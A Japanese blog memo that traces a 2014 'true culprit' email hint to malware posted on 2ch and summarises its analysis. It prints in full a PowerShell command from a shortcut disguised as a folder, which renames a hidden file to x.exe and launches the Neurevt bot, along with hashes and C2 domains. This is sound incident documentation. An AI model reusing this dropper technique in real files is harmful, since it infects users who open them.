2014年6月1日に遠隔操作事件の真犯人を称する人物(真偽不明)からまた関係各方面にメールが送信されたようです。ここではメール文中に記載されていたヒントに関連する情報についての情報をメモとしてまとめます。
2014年6月1日の真犯人メール
satoruさんの記事参照
本日、2014年6月1日00:00:30、遠隔操作の「真犯人」と名乗る人物からまたメールが届いた。
http://d.hatena.ne.jp/satoru_net/20140601/1401561600
※便乗犯、摸倣犯の可能性もあるので、取り扱い要注意。
メール文中、おまけに記載された内容
■おまけ
この前、2ちゃんねるにウイルスを貼ったら踏み台がたくさん集まりました。
なのでまたいつでもゲームを始めることも可能です。
ヒント:poverty1398836253
2chスレッドに該当するスレッドが存在
当該スレッドにマルウェアをaxfcにアップしたURLの書込みが存在
http://fox.2ch.net/test/read.cgi/poverty/1398836253/287
- 書込み日時:2014/04/30(水) 18:49:36.14
287 :番組の途中ですがアフィサイトへの転載は禁止です:2014/04/30(水) 18:49:36.14 id:MVJERRI20
XXXX://www1.axfc.net/u/3234308
pass:newsXXXX://www.shiroutodaisuki.net/ck/ckayaka101.jpg
http://fox.2ch.net/test/read.cgi/poverty/1398836253/287
XXXX://www.shiroutodaisuki.net/ck/ckayaka102.jpg
XXXX://www.shiroutodaisuki.net/ck/ckayaka103.jpg
XXXX://www.shiroutodaisuki.net/ck/ckayaka104.jpg
- axfcのリンクは5月31日時点で既に削除済み。
- 一緒に書込みの合ったファイルは無害のように見える。
| FileName | SHA256 |
|---|---|
| FC2.rar | 8a73b0fd8629d9bbf8a65d65d293e1b449744686200cd935b21130f8b6f720ed |
| ckayaka101.jpg | 25f0a897fa1cc5c273d4c708b4a26bd3c9daa17f1d8bbfe006fa6cfeec28d361 |
| ckayaka102.jpg | bfa6c3608eed5218166583f89119bb23816611802c6c074d6c7188616347fd1b |
| ckayaka103.jpg | 6f40497ce10dc13629cec264377f40de226484e511816da923aedc179945c609 |
| ckayaka104.jpg | b4fadf852663d21f18872ee90bd0b85414b67e249fc91756578fd3029daf6e1d |
2ちゃんねるでその後騒ぎになっていた模様
- 【悲報】ロリコンケンモメン達が謎のウイルスに引っかかってパソコソをぶっ壊される
- 2014/05/01(木) 01:49:31.80〜2014/05/01(木) 05:17:54.95
- 【悲報】ロリコンケンモメン達が謎のウイルスに引っかかってパソコソをぶっ壊される ★2
- 2014/05/01(木) 05:42:05.19〜2014/05/01(木) 11:05:49.92
- 【悲報】ロリコンケンモメン達が謎のウイルスに引っかかってパソコソをぶっ壊される ★3
- 2014/05/01(木) 11:39:49.50〜2014/05/02(金) 15:56:56.25
- 情強嫌儲民、怪しいファイルDLで一斉ウイルス感染
- 2014/05/01(木) 15:14:47.55〜2014/05/01(木) 17:41:08.76
- MSE、「Zeus」検出できず カスペ、Kingsoftもアウト
- 2014/05/21(水) 01:03:14.47〜2014/05/22(木) 09:08:09.77
解析している人の記事
axfcにアップされていたマルウェアの情報
- FC2.rarに3つのファイル(desktop.ini(x.exe),mov.lnk,thumbs.db)が格納されてアップロードされた。
- ショートカットファイルmov.lnkはフォルダアイコンが指定されていた模様。
- 検体(Neurevt)はMalwrから入手可
- Powershellが入ってなければ動かない。(Windows7以降は標準で入っている。)
- グループ名に「2ch」と記述があったようで、ボットは2ちゃんねる向け専用に作成されたものである可能性。
| FileName | SHA256 |
|---|---|
| desktop.ini(x.exe) | d06afedee6372107b088817ad4aa70c4bb08a8afa72365a190fb6cdf65df7f3c |
| mov.lnk | 8429a8bd172d90c799dbb0e52dbec7b51eb45ecfed604ec2f237fd7e3db90946 |
| thumbs.db | 不明 |
フォルダに偽装したショートカットファイル
- リンク先に次の文字列が指定されている。
C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe md 'mov' ;del 'mov.lnk' ;saps mov ;mv thumbs.db mov\mov.flv;sp mov\mov.flv attributes Archive;mv 'desktop.ini' '%temp%\x.exe';saps '%temp%\x.exe';
- ショートカットファイルを実行すると一緒に添付されていたマルウェアがコピーされた上で実行される。
| 文字列 | コマンド | 内容 |
|---|---|---|
| md 'mov' ; | mkdir | movというディレクトリを作成する。 |
| del 'mov.lnk' ; | Remove-Item | 実行されたショートカットファイル(mov.lnk)を削除する。 |
| saps mov ; | Start-Process | movフォルダをExplorerで開く。 |
| mv thumbs.db mov\mov.flv; | Move-Item | thumbs.dbファイルをmov.flvファイルにリネームし、movフォルダに移動する。 |
| sp mov\mov.flv attributes Archive; | Set-ItemProperty | mov.flvの属性を変更し、アーカイブ可能にする。 |
| mv 'desktop.ini' '%temp%\x.exe'; | Move-Item | desktop.iniをx.exeにリネームし、%TEMP%フォルダに移動する。 |
| saps '%temp%\x.exe' | Start-Process | x.exe(Neurevt)を実行する。 |
通信先
zosx.asia
http://blogs.yahoo.co.jp/fireflyframer/32721019.html
7cce.asia
3jdy.asia
o8dj.asia
ailq.asia
y7ah.asia
ajib.asia
brt8.asia
8i7h.asia
zign.asia
